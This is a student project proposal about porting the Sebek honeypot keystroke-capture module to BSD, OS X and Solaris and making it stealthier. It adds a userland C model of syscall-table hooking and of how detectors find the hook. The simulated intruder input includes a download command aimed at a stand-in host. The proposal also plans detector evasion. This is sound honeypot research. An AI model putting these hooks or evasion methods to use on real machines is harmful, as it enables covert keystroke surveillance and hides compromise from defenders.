CS 228 Project Proposal Write-Up
SEBEK: BSD, OS X, Solaris, Covertness

Sebek is a part of the Honeynet Project (www.honeynet.org), designed to provide insight into the world of the hacker and cracker. Sebek's part is to capture session traffic, mainly keystrokes, when sniffers and intrusion detection systems are not useful. Today that mostly means ssh and scp sessions, since their traffic is encrypted on the wire, but in the future the need for Sebek could be much more common. Sebek does this through a loadable kernel module and a few "helper applications". Sebek acts as a rootkit: it loads into kernel memory space, intercepts system calls, and captures any desired data entering the kernel from user applications (such as ssh).

Currently Sebek works at a beta level on Linux operating systems. I believe it is most commonly tested on and developed for RedHat Linux, but other flavors of the OS are also supported.

My initial goal is to determine how hard it is to port Sebek over to FreeBSD. More specifically, I will install and configure a normal FreeBSD 4.6.2 installation. I will then attempt to compile and install Sebek in its current form, as is. Here I expect to run into compilation errors, as kernel functions and system calls may differ between the two. For this I will need to learn more about BSD kernel programming. I already have a few good links on loadable kernel modules for BSD systems, which have given me a good start. If the port to FreeBSD is not straightforward, that will take up my first few weeks of the course. Regardless of how long that takes, once it has been completed I will try to port Sebek over to Mac OS X. I believe this should be straightforward, as OS X has a BSD core. Once this step has been completed, I plan to work on the covertness of Sebek.
Since Sebek has the same traits as other, more malicious rootkits, there are plenty of rootkit detectors that would alert a hacker to its presence (and therefore alert them to the machine being a honeypot / honeynet). Another option is that once I have the FreeBSD version working (and hopefully the OS X one as well), I could work on porting the system to Solaris. Solaris boxes have been good Internet servers for a while and remarkably seem to still be doing all right.

So that is what I expect my quarter of CS 228 to consist of. I plan on completing a few ports and possibly making Sebek more stealthy / covert. If time permits, I hope to research a new way of sending data covertly through headers and other parts of various protocols.
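To make concrete both the capture mechanism described in the first section (a kernel module that swaps a syscall-table entry for a logging wrapper) and the reason rootkit detectors flag it (the live table no longer matches a known-good copy), here is a userland model in C. It is an added example written for this write-up, not Sebek's own code and not FreeBSD kernel code: the table layout, the TOY_SYS_READ index, the one-size-fits-all syscall signature, and the "tty input" string are all constructed for the example. A real FreeBSD 4.x sysent entry takes a (struct proc *, void *uap) pair, and Sebek's module copies the data with the kernel's own copyin/copyout helpers rather than a plain memcpy.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed toy syscall table; index values are assumptions, not FreeBSD's. */
#define TOY_SYS_READ  3
#define TOY_NSYSCALLS 8

typedef long (*syscall_fn)(int fd, char *buf, size_t len);

/* Constructed "tty input": what an intruder types over an encrypted ssh session. */
static const char tty_input[] = "id\nwget evil.example/rk.tgz\n";
static size_t tty_pos;

/* Stand-in for the kernel's real read(): hands the process the next bytes of input. */
static long kernel_read(int fd, char *buf, size_t len)
{
    size_t avail = strlen(tty_input) - tty_pos;
    size_t n = len < avail ? len : avail;
    (void)fd;
    memcpy(buf, tty_input + tty_pos, n);
    tty_pos += n;
    return (long)n;
}

static long kernel_noop(int fd, char *buf, size_t len)
{
    (void)fd; (void)buf; (void)len;
    return 0;
}

/* The live table the kernel dispatches through, and a pristine copy a detector keeps. */
static syscall_fn sysent[TOY_NSYSCALLS];
static syscall_fn clean_sysent[TOY_NSYSCALLS];

void init_table(void)
{
    int i;
    for (i = 0; i < TOY_NSYSCALLS; i++)
        sysent[i] = kernel_noop;
    sysent[TOY_SYS_READ] = kernel_read;
    memcpy(clean_sysent, sysent, sizeof sysent);
    tty_pos = 0;
}

/* Sebek-style hook: run the real read(), then keep a copy of what the process got. */
static char keystroke_log[256];
static size_t log_len;
static syscall_fn saved_read;

static long logging_read(int fd, char *buf, size_t len)
{
    long n = saved_read(fd, buf, len);
    if (n > 0 && log_len + (size_t)n < sizeof keystroke_log) {
        memcpy(keystroke_log + log_len, buf, (size_t)n);
        log_len += (size_t)n;
    }
    return n;                      /* the calling process sees no difference */
}

void hook_install(void)
{
    saved_read = sysent[TOY_SYS_READ];
    sysent[TOY_SYS_READ] = logging_read;
    log_len = 0;
}

void hook_remove(void)
{
    sysent[TOY_SYS_READ] = saved_read;
}

/* Simulated victim shell: reads its tty in small chunks through the table. */
long victim_shell_reads(size_t chunk)
{
    char buf[64];
    long total = 0, n;
    if (chunk == 0 || chunk > sizeof buf)
        chunk = sizeof buf;
    while ((n = sysent[TOY_SYS_READ](0, buf, chunk)) > 0)
        total += n;
    return total;
}

const char *captured_keystrokes(void)
{
    keystroke_log[log_len] = '\0';
    return keystroke_log;
}

/* What a rootkit checker does: diff the live table against the known-good copy. */
int detector_count_hooked(void)
{
    int i, count = 0;
    for (i = 0; i < TOY_NSYSCALLS; i++)
        if (sysent[i] != clean_sysent[i])
            count++;
    return count;
}

int detector_first_hooked(void)
{
    int i;
    for (i = 0; i < TOY_NSYSCALLS; i++)
        if (sysent[i] != clean_sysent[i])
            return i;
    return -1;
}

int main(void)
{
    init_table();
    hook_install();
    victim_shell_reads(5);
    printf("captured: %s", captured_keystrokes());
    printf("detector: %d hooked entry(ies), first at index %d\n",
           detector_count_hooked(), detector_first_hooked());
    hook_remove();
    return 0;
}
```

The victim gets every byte it asked for and the same return values, which is why a network sniffer or the intruder's own session shows nothing; the detector, on the other hand, needs only a pointer comparison against a baseline to find the swapped entry. That comparison is exactly what the covertness work would have to defeat, for instance by leaving the table intact and interposing somewhere a checker does not compare.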